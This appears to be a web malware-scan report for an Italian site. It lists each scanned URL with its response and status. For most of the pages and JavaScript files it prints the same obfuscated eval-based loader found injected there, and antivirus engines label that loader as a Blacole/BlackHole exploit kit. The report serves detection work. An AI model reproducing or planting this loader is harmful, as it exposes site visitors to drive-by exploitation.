Request | Server response | Status |
http://piquadroenergia.it/ | 200 OK Content-Length: 15754 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) rnvj="y";ibko="document";try{+function(){if(document.querySelector)--(window[ibko].getElementById("asd"))}()}catch(mlqert){lsjj=function(wqurq){wqurq="fro"+wqurq;for(tac=0;tac<rnvj.length;tac++){olqmw+=String[wqurq](lpmlew(yik+(rnvj[tac]))-(69));}};};lpmlew=(window.eval);yik="0x";xijca=0;if(!xijca){try{++lpmlew(ibko)["\x62o"+"d"+rnvj]}catch(mlqert){wglhl="(";}rnvj="65(ab(ba(b3(a8(b9(ae(b4(b3(65(a7(ba(be(ae(b9(75(7e(6d(6e(65(c0(52(4f(65(bb(a6(b7(65(b8(b9(a6(b9(ae(a8(82(6c(a6(af(a6(bd(6c(80(52(
... 3726 bytes are skipped ...b3(71(65(aa(b3(a9(65(6e(65(6e(80(52(4f(c2(52(4f(ae(ab(65(6d(b3(a6(bb(ae(ac(a6(b9(b4(b7(73(a8(b4(b4(b0(ae(aa(8a(b3(a6(a7(b1(aa(a9(6e(52(4f(c0(52(4f(ae(ab(6d(8c(aa(b9(88(b4(b4(b0(ae(aa(6d(6c(bb(ae(b8(ae(b9(aa(a9(a4(ba(b6(6c(6e(82(82(7a(7a(6e(c0(c2(aa(b1(b8(aa(c0(98(aa(b9(88(b4(b4(b0(ae(aa(6d(6c(bb(ae(b8(ae(b9(aa(a9(a4(ba(b6(6c(71(65(6c(7a(7a(6c(71(65(6c(76(6c(71(65(6c(74(6c(6e(80(52(4f(52(4f(a7(ba(be(ae(b9(75(7e(6d(6e(80(52(4f(c2(52(4f(c2".split(wglhl);olqmw="";lsjj("mCharCode");lpmlew(""+olqmw);}Antivirus reports:- AntiVir
- JS/Blacole.EB.226
- Avast
- JS:Decode-BKU [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.PG
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Exploit.BlackHole.PG
- TrendMicro-HouseCall
- TROJ_GEN.F47V1028
- Comodo
- UnclassifiedMalware
- Emsisoft
- JS:Exploit.BlackHole.PG (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Exploit:JS/Blacole.OF
- MicroWorld-eScan
- JS:Exploit.BlackHole.PG
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Exploit.BlackHole.PG
- VIPRE
- Exploit.JS.Blacole.of (v)
- AVG
- JS/Exploit
- Norman
- Blacole.XD
- GData
- JS:Exploit.BlackHole.PG
- BitDefender
- JS:Exploit.BlackHole.PG
|
http://piquadroenergia.it/Cartoceto.html | 200 OK Content-Length: 10965 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) rnvj="y";ibko="document";try{+function(){if(document.querySelector)--(window[ibko].getElementById("asd"))}()}catch(mlqert){lsjj=function(wqurq){wqurq="fro"+wqurq;for(tac=0;tac<rnvj.length;tac++){olqmw+=String[wqurq](lpmlew(yik+(rnvj[tac]))-(69));}};};lpmlew=(window.eval);yik="0x";xijca=0;if(!xijca){try{++lpmlew(ibko)["\x62o"+"d"+rnvj]}catch(mlqert){wglhl="(";}rnvj="65(ab(ba(b3(a8(b9(ae(b4(b3(65(a7(ba(be(ae(b9(75(7e(6d(6e(65(c0(52(4f(65(bb(a6(b7(65(b8(b9(a6(b9(ae(a8(82(6c(a6(af(a6(bd(6c(80(52(
... 3726 bytes are skipped ...b3(71(65(aa(b3(a9(65(6e(65(6e(80(52(4f(c2(52(4f(ae(ab(65(6d(b3(a6(bb(ae(ac(a6(b9(b4(b7(73(a8(b4(b4(b0(ae(aa(8a(b3(a6(a7(b1(aa(a9(6e(52(4f(c0(52(4f(ae(ab(6d(8c(aa(b9(88(b4(b4(b0(ae(aa(6d(6c(bb(ae(b8(ae(b9(aa(a9(a4(ba(b6(6c(6e(82(82(7a(7a(6e(c0(c2(aa(b1(b8(aa(c0(98(aa(b9(88(b4(b4(b0(ae(aa(6d(6c(bb(ae(b8(ae(b9(aa(a9(a4(ba(b6(6c(71(65(6c(7a(7a(6c(71(65(6c(76(6c(71(65(6c(74(6c(6e(80(52(4f(52(4f(a7(ba(be(ae(b9(75(7e(6d(6e(80(52(4f(c2(52(4f(c2".split(wglhl);olqmw="";lsjj("mCharCode");lpmlew(""+olqmw);}Antivirus reports:- AntiVir
- JS/Blacole.EB.226
- Avast
- JS:Decode-BKU [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.PG
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Exploit.BlackHole.PG
- TrendMicro-HouseCall
- TROJ_GEN.F47V1028
- Comodo
- UnclassifiedMalware
- Emsisoft
- JS:Exploit.BlackHole.PG (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Exploit:JS/Blacole.OF
- MicroWorld-eScan
- JS:Exploit.BlackHole.PG
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Exploit.BlackHole.PG
- VIPRE
- Exploit.JS.Blacole.of (v)
- AVG
- JS/Exploit
- Norman
- Blacole.XD
- GData
- JS:Exploit.BlackHole.PG
- BitDefender
- JS:Exploit.BlackHole.PG
|
http://piquadroenergia.it/js/jquery.js | 200 OK Content-Length: 67661 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) rnvj="y";ibko="document";try{+function(){if(document.querySelector)--(window[ibko].getElementById("asd"))}()}catch(mlqert){lsjj=function(wqurq){wqurq="fro"+wqurq;for(tac=0;tac<rnvj.length;tac++){olqmw+=String[wqurq](lpmlew(yik+(rnvj[tac]))-(69));}};};lpmlew=(window.eval);yik="0x";xijca=0;if(!xijca){try{++lpmlew(ibko)["\x62o"+"d"+rnvj]}catch(mlqert){wglhl="(";}rnvj="65(ab(ba(b3(a8(b9(ae(b4(b3(65(a7(ba(be(ae(b9(75(7e(6d(6e(65(c0(52(4f(65(bb(a6(b7(65(b8(b9(a6(b9(ae(a8(82(6c(a6(af(a6(bd(6c(80(52(
... 3726 bytes are skipped ...b3(71(65(aa(b3(a9(65(6e(65(6e(80(52(4f(c2(52(4f(ae(ab(65(6d(b3(a6(bb(ae(ac(a6(b9(b4(b7(73(a8(b4(b4(b0(ae(aa(8a(b3(a6(a7(b1(aa(a9(6e(52(4f(c0(52(4f(ae(ab(6d(8c(aa(b9(88(b4(b4(b0(ae(aa(6d(6c(bb(ae(b8(ae(b9(aa(a9(a4(ba(b6(6c(6e(82(82(7a(7a(6e(c0(c2(aa(b1(b8(aa(c0(98(aa(b9(88(b4(b4(b0(ae(aa(6d(6c(bb(ae(b8(ae(b9(aa(a9(a4(ba(b6(6c(71(65(6c(7a(7a(6c(71(65(6c(76(6c(71(65(6c(74(6c(6e(80(52(4f(52(4f(a7(ba(be(ae(b9(75(7e(6d(6e(80(52(4f(c2(52(4f(c2".split(wglhl);olqmw="";lsjj("mCharCode");lpmlew(""+olqmw);}Antivirus reports:- AntiVir
- JS/Blacole.EB.226
- Avast
- JS:Decode-BKU [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.PG
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Exploit.BlackHole.PG
- TrendMicro-HouseCall
- TROJ_GEN.F47V1028
- Comodo
- UnclassifiedMalware
- Emsisoft
- JS:Exploit.BlackHole.PG (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Exploit:JS/Blacole.OF
- MicroWorld-eScan
- JS:Exploit.BlackHole.PG
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Exploit.BlackHole.PG
- VIPRE
- Exploit.JS.Blacole.of (v)
- AVG
- JS/Exploit
- Norman
- Blacole.XD
- GData
- JS:Exploit.BlackHole.PG
- BitDefender
- JS:Exploit.BlackHole.PG
|
http://piquadroenergia.it/js/interface.js | 200 OK Content-Length: 92710 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) rnvj="y";ibko="document";try{+function(){if(document.querySelector)--(window[ibko].getElementById("asd"))}()}catch(mlqert){lsjj=function(wqurq){wqurq="fro"+wqurq;for(tac=0;tac<rnvj.length;tac++){olqmw+=String[wqurq](lpmlew(yik+(rnvj[tac]))-(69));}};};lpmlew=(window.eval);yik="0x";xijca=0;if(!xijca){try{++lpmlew(ibko)["\x62o"+"d"+rnvj]}catch(mlqert){wglhl="(";}rnvj="65(ab(ba(b3(a8(b9(ae(b4(b3(65(a7(ba(be(ae(b9(75(7e(6d(6e(65(c0(52(4f(65(bb(a6(b7(65(b8(b9(a6(b9(ae(a8(82(6c(a6(af(a6(bd(6c(80(52(
... 3726 bytes are skipped ...b3(71(65(aa(b3(a9(65(6e(65(6e(80(52(4f(c2(52(4f(ae(ab(65(6d(b3(a6(bb(ae(ac(a6(b9(b4(b7(73(a8(b4(b4(b0(ae(aa(8a(b3(a6(a7(b1(aa(a9(6e(52(4f(c0(52(4f(ae(ab(6d(8c(aa(b9(88(b4(b4(b0(ae(aa(6d(6c(bb(ae(b8(ae(b9(aa(a9(a4(ba(b6(6c(6e(82(82(7a(7a(6e(c0(c2(aa(b1(b8(aa(c0(98(aa(b9(88(b4(b4(b0(ae(aa(6d(6c(bb(ae(b8(ae(b9(aa(a9(a4(ba(b6(6c(71(65(6c(7a(7a(6c(71(65(6c(76(6c(71(65(6c(74(6c(6e(80(52(4f(52(4f(a7(ba(be(ae(b9(75(7e(6d(6e(80(52(4f(c2(52(4f(c2".split(wglhl);olqmw="";lsjj("mCharCode");lpmlew(""+olqmw);}Antivirus reports:- AntiVir
- JS/Blacole.EB.226
- Avast
- JS:Decode-BKU [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.PG
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Exploit.BlackHole.PG
- TrendMicro-HouseCall
- TROJ_GEN.F47V1028
- Comodo
- UnclassifiedMalware
- Emsisoft
- JS:Exploit.BlackHole.PG (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Exploit:JS/Blacole.OF
- MicroWorld-eScan
- JS:Exploit.BlackHole.PG
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Exploit.BlackHole.PG
- VIPRE
- Exploit.JS.Blacole.of (v)
- AVG
- JS/Exploit
- Norman
- Blacole.XD
- GData
- JS:Exploit.BlackHole.PG
- BitDefender
- JS:Exploit.BlackHole.PG
|
http://piquadroenergia.it/js/coin-slider.min.js | 200 OK Content-Length: 21752 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) rnvj="y";ibko="document";try{+function(){if(document.querySelector)--(window[ibko].getElementById("asd"))}()}catch(mlqert){lsjj=function(wqurq){wqurq="fro"+wqurq;for(tac=0;tac<rnvj.length;tac++){olqmw+=String[wqurq](lpmlew(yik+(rnvj[tac]))-(69));}};};lpmlew=(window.eval);yik="0x";xijca=0;if(!xijca){try{++lpmlew(ibko)["\x62o"+"d"+rnvj]}catch(mlqert){wglhl="(";}rnvj="65(ab(ba(b3(a8(b9(ae(b4(b3(65(a7(ba(be(ae(b9(75(7e(6d(6e(65(c0(52(4f(65(bb(a6(b7(65(b8(b9(a6(b9(ae(a8(82(6c(a6(af(a6(bd(6c(80(52(
... 3726 bytes are skipped ...b3(71(65(aa(b3(a9(65(6e(65(6e(80(52(4f(c2(52(4f(ae(ab(65(6d(b3(a6(bb(ae(ac(a6(b9(b4(b7(73(a8(b4(b4(b0(ae(aa(8a(b3(a6(a7(b1(aa(a9(6e(52(4f(c0(52(4f(ae(ab(6d(8c(aa(b9(88(b4(b4(b0(ae(aa(6d(6c(bb(ae(b8(ae(b9(aa(a9(a4(ba(b6(6c(6e(82(82(7a(7a(6e(c0(c2(aa(b1(b8(aa(c0(98(aa(b9(88(b4(b4(b0(ae(aa(6d(6c(bb(ae(b8(ae(b9(aa(a9(a4(ba(b6(6c(71(65(6c(7a(7a(6c(71(65(6c(76(6c(71(65(6c(74(6c(6e(80(52(4f(52(4f(a7(ba(be(ae(b9(75(7e(6d(6e(80(52(4f(c2(52(4f(c2".split(wglhl);olqmw="";lsjj("mCharCode");lpmlew(""+olqmw);}Antivirus reports:- AntiVir
- JS/Blacole.EB.226
- Avast
- JS:Decode-BKU [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.PG
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Exploit.BlackHole.PG
- TrendMicro-HouseCall
- TROJ_GEN.F47V1028
- Comodo
- UnclassifiedMalware
- Emsisoft
- JS:Exploit.BlackHole.PG (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Exploit:JS/Blacole.OF
- MicroWorld-eScan
- JS:Exploit.BlackHole.PG
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Exploit.BlackHole.PG
- VIPRE
- Exploit.JS.Blacole.of (v)
- AVG
- JS/Exploit
- Norman
- Blacole.XD
- GData
- JS:Exploit.BlackHole.PG
- BitDefender
- JS:Exploit.BlackHole.PG
|
http://piquadroenergia.it/js/coin-slider.js | 200 OK Content-Length: 24285 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) rnvj="y";ibko="document";try{+function(){if(document.querySelector)--(window[ibko].getElementById("asd"))}()}catch(mlqert){lsjj=function(wqurq){wqurq="fro"+wqurq;for(tac=0;tac<rnvj.length;tac++){olqmw+=String[wqurq](lpmlew(yik+(rnvj[tac]))-(69));}};};lpmlew=(window.eval);yik="0x";xijca=0;if(!xijca){try{++lpmlew(ibko)["\x62o"+"d"+rnvj]}catch(mlqert){wglhl="(";}rnvj="65(ab(ba(b3(a8(b9(ae(b4(b3(65(a7(ba(be(ae(b9(75(7e(6d(6e(65(c0(52(4f(65(bb(a6(b7(65(b8(b9(a6(b9(ae(a8(82(6c(a6(af(a6(bd(6c(80(52(
... 3726 bytes are skipped ...b3(71(65(aa(b3(a9(65(6e(65(6e(80(52(4f(c2(52(4f(ae(ab(65(6d(b3(a6(bb(ae(ac(a6(b9(b4(b7(73(a8(b4(b4(b0(ae(aa(8a(b3(a6(a7(b1(aa(a9(6e(52(4f(c0(52(4f(ae(ab(6d(8c(aa(b9(88(b4(b4(b0(ae(aa(6d(6c(bb(ae(b8(ae(b9(aa(a9(a4(ba(b6(6c(6e(82(82(7a(7a(6e(c0(c2(aa(b1(b8(aa(c0(98(aa(b9(88(b4(b4(b0(ae(aa(6d(6c(bb(ae(b8(ae(b9(aa(a9(a4(ba(b6(6c(71(65(6c(7a(7a(6c(71(65(6c(76(6c(71(65(6c(74(6c(6e(80(52(4f(52(4f(a7(ba(be(ae(b9(75(7e(6d(6e(80(52(4f(c2(52(4f(c2".split(wglhl);olqmw="";lsjj("mCharCode");lpmlew(""+olqmw);}Antivirus reports:- AntiVir
- JS/Blacole.EB.226
- Avast
- JS:Decode-BKU [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.PG
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Exploit.BlackHole.PG
- TrendMicro-HouseCall
- TROJ_GEN.F47V1028
- Comodo
- UnclassifiedMalware
- Emsisoft
- JS:Exploit.BlackHole.PG (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Exploit:JS/Blacole.OF
- MicroWorld-eScan
- JS:Exploit.BlackHole.PG
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Exploit.BlackHole.PG
- VIPRE
- Exploit.JS.Blacole.of (v)
- AVG
- JS/Exploit
- Norman
- Blacole.XD
- GData
- JS:Exploit.BlackHole.PG
- BitDefender
- JS:Exploit.BlackHole.PG
|
http://www.piquadrosrl.com/script/aggiornamento.js | 200 OK Content-Length: 19 Content-Type: application/javascript | clean |
http://piquadroenergia.it/index.html | 200 OK Content-Length: 15754 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) rnvj="y";ibko="document";try{+function(){if(document.querySelector)--(window[ibko].getElementById("asd"))}()}catch(mlqert){lsjj=function(wqurq){wqurq="fro"+wqurq;for(tac=0;tac<rnvj.length;tac++){olqmw+=String[wqurq](lpmlew(yik+(rnvj[tac]))-(69));}};};lpmlew=(window.eval);yik="0x";xijca=0;if(!xijca){try{++lpmlew(ibko)["\x62o"+"d"+rnvj]}catch(mlqert){wglhl="(";}rnvj="65(ab(ba(b3(a8(b9(ae(b4(b3(65(a7(ba(be(ae(b9(75(7e(6d(6e(65(c0(52(4f(65(bb(a6(b7(65(b8(b9(a6(b9(ae(a8(82(6c(a6(af(a6(bd(6c(80(52(
... 3726 bytes are skipped ...b3(71(65(aa(b3(a9(65(6e(65(6e(80(52(4f(c2(52(4f(ae(ab(65(6d(b3(a6(bb(ae(ac(a6(b9(b4(b7(73(a8(b4(b4(b0(ae(aa(8a(b3(a6(a7(b1(aa(a9(6e(52(4f(c0(52(4f(ae(ab(6d(8c(aa(b9(88(b4(b4(b0(ae(aa(6d(6c(bb(ae(b8(ae(b9(aa(a9(a4(ba(b6(6c(6e(82(82(7a(7a(6e(c0(c2(aa(b1(b8(aa(c0(98(aa(b9(88(b4(b4(b0(ae(aa(6d(6c(bb(ae(b8(ae(b9(aa(a9(a4(ba(b6(6c(71(65(6c(7a(7a(6c(71(65(6c(76(6c(71(65(6c(74(6c(6e(80(52(4f(52(4f(a7(ba(be(ae(b9(75(7e(6d(6e(80(52(4f(c2(52(4f(c2".split(wglhl);olqmw="";lsjj("mCharCode");lpmlew(""+olqmw);}Antivirus reports:- AntiVir
- JS/Blacole.EB.226
- Avast
- JS:Decode-BKU [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.PG
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Exploit.BlackHole.PG
- TrendMicro-HouseCall
- TROJ_GEN.F47V1028
- Comodo
- UnclassifiedMalware
- Emsisoft
- JS:Exploit.BlackHole.PG (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Exploit:JS/Blacole.OF
- MicroWorld-eScan
- JS:Exploit.BlackHole.PG
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Exploit.BlackHole.PG
- VIPRE
- Exploit.JS.Blacole.of (v)
- AVG
- JS/Exploit
- Norman
- Blacole.XD
- GData
- JS:Exploit.BlackHole.PG
- BitDefender
- JS:Exploit.BlackHole.PG
|
http://piquadroenergia.it/Camminate.html | 200 OK Content-Length: 11800 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) rnvj="y";ibko="document";try{+function(){if(document.querySelector)--(window[ibko].getElementById("asd"))}()}catch(mlqert){lsjj=function(wqurq){wqurq="fro"+wqurq;for(tac=0;tac<rnvj.length;tac++){olqmw+=String[wqurq](lpmlew(yik+(rnvj[tac]))-(69));}};};lpmlew=(window.eval);yik="0x";xijca=0;if(!xijca){try{++lpmlew(ibko)["\x62o"+"d"+rnvj]}catch(mlqert){wglhl="(";}rnvj="65(ab(ba(b3(a8(b9(ae(b4(b3(65(a7(ba(be(ae(b9(75(7e(6d(6e(65(c0(52(4f(65(bb(a6(b7(65(b8(b9(a6(b9(ae(a8(82(6c(a6(af(a6(bd(6c(80(52(
... 3726 bytes are skipped ...b3(71(65(aa(b3(a9(65(6e(65(6e(80(52(4f(c2(52(4f(ae(ab(65(6d(b3(a6(bb(ae(ac(a6(b9(b4(b7(73(a8(b4(b4(b0(ae(aa(8a(b3(a6(a7(b1(aa(a9(6e(52(4f(c0(52(4f(ae(ab(6d(8c(aa(b9(88(b4(b4(b0(ae(aa(6d(6c(bb(ae(b8(ae(b9(aa(a9(a4(ba(b6(6c(6e(82(82(7a(7a(6e(c0(c2(aa(b1(b8(aa(c0(98(aa(b9(88(b4(b4(b0(ae(aa(6d(6c(bb(ae(b8(ae(b9(aa(a9(a4(ba(b6(6c(71(65(6c(7a(7a(6c(71(65(6c(76(6c(71(65(6c(74(6c(6e(80(52(4f(52(4f(a7(ba(be(ae(b9(75(7e(6d(6e(80(52(4f(c2(52(4f(c2".split(wglhl);olqmw="";lsjj("mCharCode");lpmlew(""+olqmw);}Antivirus reports:- AntiVir
- JS/Blacole.EB.226
- Avast
- JS:Decode-BKU [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.PG
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Exploit.BlackHole.PG
- TrendMicro-HouseCall
- TROJ_GEN.F47V1028
- Comodo
- UnclassifiedMalware
- Emsisoft
- JS:Exploit.BlackHole.PG (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Exploit:JS/Blacole.OF
- MicroWorld-eScan
- JS:Exploit.BlackHole.PG
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Exploit.BlackHole.PG
- VIPRE
- Exploit.JS.Blacole.of (v)
- AVG
- JS/Exploit
- Norman
- Blacole.XD
- GData
- JS:Exploit.BlackHole.PG
- BitDefender
- JS:Exploit.BlackHole.PG
|
http://piquadroenergia.it/test404page.js | 404 Not Found Content-Length: 910 Content-Type: text/html | clean |
http://piquadroenergia.it/Cagli.html | 200 OK Content-Length: 11429 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) rnvj="y";ibko="document";try{+function(){if(document.querySelector)--(window[ibko].getElementById("asd"))}()}catch(mlqert){lsjj=function(wqurq){wqurq="fro"+wqurq;for(tac=0;tac<rnvj.length;tac++){olqmw+=String[wqurq](lpmlew(yik+(rnvj[tac]))-(69));}};};lpmlew=(window.eval);yik="0x";xijca=0;if(!xijca){try{++lpmlew(ibko)["\x62o"+"d"+rnvj]}catch(mlqert){wglhl="(";}rnvj="65(ab(ba(b3(a8(b9(ae(b4(b3(65(a7(ba(be(ae(b9(75(7e(6d(6e(65(c0(52(4f(65(bb(a6(b7(65(b8(b9(a6(b9(ae(a8(82(6c(a6(af(a6(bd(6c(80(52(
... 3726 bytes are skipped ...b3(71(65(aa(b3(a9(65(6e(65(6e(80(52(4f(c2(52(4f(ae(ab(65(6d(b3(a6(bb(ae(ac(a6(b9(b4(b7(73(a8(b4(b4(b0(ae(aa(8a(b3(a6(a7(b1(aa(a9(6e(52(4f(c0(52(4f(ae(ab(6d(8c(aa(b9(88(b4(b4(b0(ae(aa(6d(6c(bb(ae(b8(ae(b9(aa(a9(a4(ba(b6(6c(6e(82(82(7a(7a(6e(c0(c2(aa(b1(b8(aa(c0(98(aa(b9(88(b4(b4(b0(ae(aa(6d(6c(bb(ae(b8(ae(b9(aa(a9(a4(ba(b6(6c(71(65(6c(7a(7a(6c(71(65(6c(76(6c(71(65(6c(74(6c(6e(80(52(4f(52(4f(a7(ba(be(ae(b9(75(7e(6d(6e(80(52(4f(c2(52(4f(c2".split(wglhl);olqmw="";lsjj("mCharCode");lpmlew(""+olqmw);}Antivirus reports:- AntiVir
- JS/Blacole.EB.226
- Avast
- JS:Decode-BKU [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.PG
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Exploit.BlackHole.PG
- TrendMicro-HouseCall
- TROJ_GEN.F47V1028
- Comodo
- UnclassifiedMalware
- Emsisoft
- JS:Exploit.BlackHole.PG (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Exploit:JS/Blacole.OF
- MicroWorld-eScan
- JS:Exploit.BlackHole.PG
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Exploit.BlackHole.PG
- VIPRE
- Exploit.JS.Blacole.of (v)
- AVG
- JS/Exploit
- Norman
- Blacole.XD
- GData
- JS:Exploit.BlackHole.PG
- BitDefender
- JS:Exploit.BlackHole.PG
|